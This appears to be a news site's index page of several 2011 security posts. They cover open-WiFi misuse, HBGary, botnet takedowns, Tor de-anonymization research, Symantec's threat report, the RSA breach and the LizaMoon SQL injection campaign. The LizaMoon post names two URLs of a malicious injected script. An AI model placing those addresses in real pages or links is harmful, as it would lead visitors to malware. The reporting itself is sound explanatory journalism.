Will it take being accused of downloading child pornography to get people to lock down their WiFi networks once and for all? Although that's not the only reason to keep your network secure, perhaps some users will be scared into doing so after reading a number of horror stories collected by the Associated Press over the weekend. The underlying lesson: keep your WiFi networks locked down, lest you find law enforcement kicking down your door in the middle of the night.

The three stories all fall along the same theme: a Buffalo man, Sarasota man, and Syracuse man all found themselves being raided by the FBI or police after their wireless networks were allegedly used to download child pornography. "You're a creep... just admit it," one FBI agent was quoted saying to the accused party. In all three cases, the accused ended up getting off the hook after their files were examined and neighbors were found to be responsible for downloading child porn via unsecured WiFi networks.

Being accused of amassing the world's largest collection of child pornography is just one of the many downsides to leaving your network open, yet people (including some self-identified geeks) continue to do it. But why? As evidenced by reader e-mail over the last few years, some users claim they're providing a service to their neighbors by letting them use their WiFi every so often (in turn, these users tend to also make use of open WiFi networks when they see them). Others hope that leaving their WiFi networks open will help to exonerate them if they were to be accused of downloading copyrighted music or movies—Big Content would never sue the wrong individual for copyright infringement, right?

The AP's cautionary tales come just months after wireless industry group Wi-Fi Alliance published a survey saying that 32 percent of Internet users have tried to connect to a WiFi network that wasn't theirs. When managing their own networks though, 40 percent said that they would be more likely to trust someone with a key to their homes than the password to their WiFi access points. "Much like the seatbelts in your car, [WiFi security] won't protect you unless you use it," Wi-Fi Alliance marketing director Kelly Davis-Felner said at the time.

We have a guide to protecting yourself on public WiFi hotspots, but what about your own WiFi network? The Wi-Fi Alliance recommends implementing WPA2 protections and strong passwords (at least eight characters, no dictionary words, with a mixture of upper and lower case letters, numbers, and symbols). You can also change your router's settings so that your SSID is no longer being broadcast to nearby devices, and if you want to be extra secure, you can require each device's MAC address to be approved before they can connect. Doing so may lose you friend points during your annual Super Bowl party, but it will go a long way towards avoiding unwanted accusations of downloading child pornography.

Read the comments on this post

HBGary, the security firm that saw its servers hacked and its e-mails released after its HBGary Federal offshoot angered the Anonymous hive, published a rather peculiar open letter this past Friday in an effort to address the "large amount of misinformation reported in the press." But the letter makes some questionable claims of its own.

The unsigned letter outlines the basics of the attack and asserts that HBGary's internal systems remained safe and uncompromised. To ward off future attacks, the letter also claimed that HBGary's website, which was hacked using a basic security flaw, and its e-mail system, which fell victim to weak, re-used passwords, were now back in operation with "even stronger cyber defense mechanisms."

Past efforts at killing botnets—the large networks of computers running malicious software to send spam, flood websites with traffic, and steal personal data—have managed to disable the networks by taking down important servers, but they've always stopped short of actually killing the botnet software itself. That's because the companies behind these efforts have no more legal authority to run unauthorized software on users' machines than the botnet owners do—to remove the botnet software would make them just as guilty of hacking as the bad guys are.

The result is that while efforts such as Microsoft's disruption of the Waledac and Rustock botnets were successful, they were far from perfect. These efforts left the malicious software running on the infected PCs—they just removed the command and control servers, the centralized machines that tell the botnet what to do. Should the bot herders regain control of the domain names or IP addresses used by the command-and-control servers, the infected machines will be able to successfully connect to them, and the networks will once again spring into life.

Think that anonymizing BitTorrent tracker connections through Tor makes you harder to track? Think again. A vulnerability was used to identify over 10,000 users' IP addresses via their BitTorrent tracker connections. But it's not just your BitTorrent downloads that are at risk: an attacker can use your BitTorrent connections to de-anonymize other, more secure applications run over Tor.

In a paper released a few weeks ago at the USENIX conference's workshop on Large-scale Exploits and Emergent Threats (LEET), researchers from INRIA France revealed a class of vulnerabilities in the Tor system which threatens the anonymity of many BitTorrent users. The research team, led by Stevens Le Blond, explained an attack methodology which it developed and deployed. The attack exploits a feature of Tor originally introduced to improve anonymity and efficiency, but it also relies on certain aspects of the BitTorrent protocol.

Symantec detected more than three billion malware attacks from 286 million malware variants last year, according to the 2010 edition of its annual Internet Security Threat Report, published today. Web-based attacks were up 93 percent on 2009, and you were most likely to come across a malicious Web site if you were on the hunt for pornography; 49 percent of malicious sites found through Web searches were pornographic.

Overall, the report paints a grim picture of the Internet threat landscape. Software flaws are abundant. In 2010, 6,253 software vulnerabilities were reported, higher than in any previous edition of the report. 14 vulnerabilities were used in zero-day attacks, including four different Windows zero-days used in the Stuxnet attack. 

Though data breaches are still relatively rare—457 in 2010 according to aggregator DataLossDB—they still put many at risk. About 61,000 identities were compromised on average, with breaches in the finance sector particularly big, at an average of over 235,000 identities per breach. Breaches as a result of hacks—rather than insiders, or theft or loss of hardware and media—tended to be substantial, averaging more than 262,000 identities per hack.

The bad guys also demonstrated a firm grasp of new technology. Social networking sites are a huge target, both due to their wide use and their enormous susceptibility to social engineering. In mass, untargeted attacks, the social networking sites give malicious links a veneer of integrity—if a friend of yours posts a link it's surely going to be safe, right? For spear-phishing and other targeted attacks, the social networks give valuable insight into individual habits and interests, not to mention the ability for hackers to strike up friendships with their would-be victims and to gain their trust that way.

Hand in hand with social networking sites like Twitter, we've also seen a boom in URL shortening services such as bit.ly. Hackers have been quick to exploit the way these mask the destination URL, making it much harder to know if a link is malicious until you actually click on it. Two-thirds of attacks used on social networking sites used such masked, shortened URLs.

Smartphones are also beginning to attract malware. 2010 saw the discovery of the first Android trojan, and it looks like hackers regard Android as a ripe platform for attacks—last month more than 50 malicious programs were yanked from Android Market. More vulnerabilities are being found on mobile platforms, with 163 found last year, an increase of 41 percent. While still small-scale attacks compared to their PC-based counterparts, this is set to be a growth market. Smartphones are chock full of personal information and thanks to premium rate phone and text numbers, have an unparalleled ability to monetize malware.

Patching won't save you

2010 was also a big year for targeted attacks; Google came out as a victim of the Aurora attacks, and, of course, Stuxnet struck Iran. The targeted attacks were notable for their use of zero-day vulnerabilities—three different Internet Explorer zero-days were used in three separate targeted attacks, and Stuxnet used four Windows zero-days. Social engineering was also instrumental in these attacks.

The use of zero-days is significant because it means that even an organization with good practices (patching machines on a timely basis, using anti-malware software) is at risk; these old mechanisms do little to guard against this style of attack. Heuristic analysis and sandboxing techniques both have a role to play in detecting these problems but work still needs to be done to make these easy to use, robust, and effective.

More than anything else, the report shows that the security situation really isn't improving; it's getting quite a bit worse. Social networking-based social engineering and zero-day targeted attacks put even conscientious, well-educated users at risk. Software vulnerabilities are abundant, and malware is rampant. That's good news for companies like Symantec—it ensures that they'll continue to see a large market for their security products. But it's bad news for everyone else.

Read the comments on this post

Security firm RSA announced in March that it had been the victim of a hack that it described as "extremely sophisticated." The company has now shared some details of the attack. "Extremely sophisticated"? More like "run-of-the-mill."

A spear-phishing e-mail was sent to two small groups within the company. Though the e-mail was automatically marked as Junk, the subject of the message ("2011 Recruitment Plan") tricked one employee into opening it anyway. Attached to the mail was an Excel spreadsheet, "2011 Recruitment plan.xls". Embedded within the spreadsheet was a Flash movie that exploited a Flash vulnerability. Adobe has since released an emergency patch for the flaw.

Hundreds of thousands of URLs have been compromised—at the time of writing, 694,000—in an enormous and indiscriminate SQL injection attack. The attack has modified text stored in databases, with the result that pages served up by the attacked systems include within each page one or more references to a particular JavaScript file.

The attack appears to be indiscriminate in its targets, with compromised machines running ASP, ASP.NET, ColdFusion, JSP, and PHP, and no doubt others. SQL injection attacks, which exploit badly-written Web applications to directly perform actions against databases, are largely independent of the technology used to develop the applications themselves: the programming errors that allow SQL injection can be made in virtually any language. The underlying cause is a programmer trusting input that comes from a Web page—either a value from a form, or a parameter in a URL—and passing this input directly into the database. If the input is malformed in a particular way, the result is that the database will run code of the attacker's choosing.

In this case, the injected SQL is simply updating text fields within the database, to make them include an extra fragment of HTML. This HTML in turn loads a JavaScript from a remote server, typically "http://lizamoon.com/ur.php" or more recently, "http://alisa-carter.com/ur.php." Both domain names resolve to the same IP address, and presently that server is not functional, leaving browsers unable to load the malicious script when they visit infected pages. Previously, it contained a simple script to redirect users to a fake anti-virus site.

The massive scale of these attacks (and the rapidly growing number of affected URLs) was first noticed by Websense Security Labs. On Tuesday, around 28,000 URLs were compromised; now more than 20 times more URLs are infected, and the numbers are still growing.

The injected code is also found on a number of product pages on Apple's iTunes Store. Apple fetches RSS feeds from podcasters that broadcast using iTunes, and in a number of cases these broadcasters have been compromised by the SQL injection attack. As a result, the malicious code has made its way into Apple's system. However, due to the way Apple processes the RSS feeds, there appears to be no exploitation vector; the injected HTML is safely nullified.

SQL injections following this pattern appear to have been happening off and on for six or more months now. The domain name hosting the JavaScript changes each time, but the file name—ur.php—and the style of injection remain consistent. The actions of the scripts have been similar too; pop-up windows and malware downloads. Previous efforts were on a much smaller scale, however: hundreds of compromised URLs instead of hundreds of thousands. In these earlier cases, the attacks originated from IP addresses in eastern Europe and Russia.

It's been a busy week for SQL injection; at the weekend, MySQL.com, the website of Oracle-owned open source database MySQL, was hacked, again using SQL injection. A little embarrassing for a database vendor to be unable to use its own database securely.

Read the comments on this post

It's sure to be temporary, but we should enjoy it while we can: Microsoft's action to behead the Rustock botnet has seen global spam levels drop by about a third, according to Symantec-owned messaging and security provider MessageLabs.

The full report shows that there's still a lot of work to be done. In 2010, 88 percent of all spam emails were sent by botnets, and of that botnet-originated spam, Rustock was responsible for an average of 28 percent. Taking out Rustock has unsurprisingly had a substantial impact on spam levels. However, MessageLabs reports that other botnets have increased spam production over the same period, making it likely that previous spam volumes will be resumed soon enough.

It's a one-time drop, but it's a big one.

The data does give some reason for optimism, however. Just ten botnets (including Rustock) are responsible for about 74 percent of all spam. Taking out these botnets would not be a minor undertaking, but it's still a manageable scale—the botnet market is relatively consolidated. While eradicating the botnets certainly won't eradicate spam, it may well reduce it to tolerable levels. Gradual improvements in system security—not least the slow abandonment of Windows XP—and replacement of infected systems should make it harder to recruit large-scale botnets in the future, amplifying the effect of each botnet takedown.

That future is, alas, still some way off; in the meantime, aggressive spam filtering at the server and client level is the only viable recourse. A case might also be made for better legislation—one of the more surprising aspects of Microsoft's Rustock lawsuit was the circuitous route by which the company had the server hardware used by the botnet seized. The company had to use trademark law—claiming that Rustock's spam infringed on both its own and Pfizer's trademarks—in order to have the server hardware seized. Existing anti-spam legislation only allows domain names to be taken—an insufficient tool for taking down Rustock.

Read the comments on this post